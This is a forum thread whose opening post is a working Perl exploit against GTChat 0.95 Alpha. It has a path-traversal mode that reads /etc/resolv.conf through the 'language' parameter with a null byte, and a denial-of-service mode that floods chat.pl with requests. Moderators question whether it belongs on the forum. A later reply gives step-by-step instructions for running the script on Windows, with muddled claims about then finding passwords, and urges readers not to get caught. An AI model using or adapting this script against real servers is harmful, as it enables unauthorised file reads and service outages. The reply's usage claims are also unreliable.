xisto Community
Sign in to follow this  
machinamedia

Gtchat 0.95 Alpha Remote Denial Of Service Expl

Here we go...

#!/usr/bin/perl  use LWP::Simple;   if (@ARGV < 3){   print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n";   print "sever -  URL chat\n";   print "path  -  path to chat.pl\n";   print "mode  -  poc or dos,\n";   print "                    poc - simple check without DoS and exit,\n";   print "                    dos - DoS, you must set count for requests in 4 argument.\n\n";   exit ();}     $DoS      =     "dos";   $POC      =     "poc";   $server   =  $ARGV[0];   $path     =  $ARGV[1];   $mode     =  $ARGV[2];   $count    =  $ARGV[3];   print qq(                                          ###################################                                          # GTChat <= 0.95 Alpha remote DoS #                                          #   tested on GTChat 0.95 Alpha   #                                          # Šoded by x97Rang 2005 RST/GHC #                                          #    Respect: b1f, 1dt.w0lf, ed   #                                          ################################### );if ($mode eq $POC){     print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n";   $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);     $content = get "$URL";if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/){   print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); }if ($content =~ /Fatal error/){   print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n";   print "=== OUTPUT ===============================================================================\n";   print "\n$content\n";   print & #34;=============================================================================== OUTPUT ===\n";   exit();}else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep \n"; }}if ($mode eq $DoS){if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() }   print "\nSend $count DoS requests to $server...\n";  $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server);for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; }   print "Done, packets sended.\n";}

Have phun!

Notice from cmatcmextra:
Please use codebox tags when posting large amounts of code

Notice from Dooga:

vizskywalker told me that it should not be visible, because the code teaches how to hack using denial of service exploits, and on a computer that's fast enough, could damage an unprotected server. What do you think?

Edited by Dooga (see edit history)

Is this thing legal ? ok i know it isnt.
But can those information be posted here on the forum ?
With that code you can hack that GTChat.
i see that machinamedia is advanced member so he probobly know this ;)

So if you need realy to do this on windows you will need a thing called activePerl, i think you can download it here : https://store.activestate.com/?id=ActivePerl

Then when you extract those files somewere like C:\Perl and then go to cmd ( Start > Run > type cmd ) and then type cd C:\Perl\bin\
That code that someone posted above save as something.pl and put it in the same place like ActivePerl C:\Perl
Your still didnt close that cmd window, type perl something.pl [urlofsite] [ip]
[ip] should be 80
then you have command ls -a to lista all the files in the directory of hacked page and find password.
Im sorry if i made a mistake somewere i cant remember all those things. ( didnt do that for a long time )
and if you have linux you would probobly know how to use that code.

have fun and dont let you get cought :)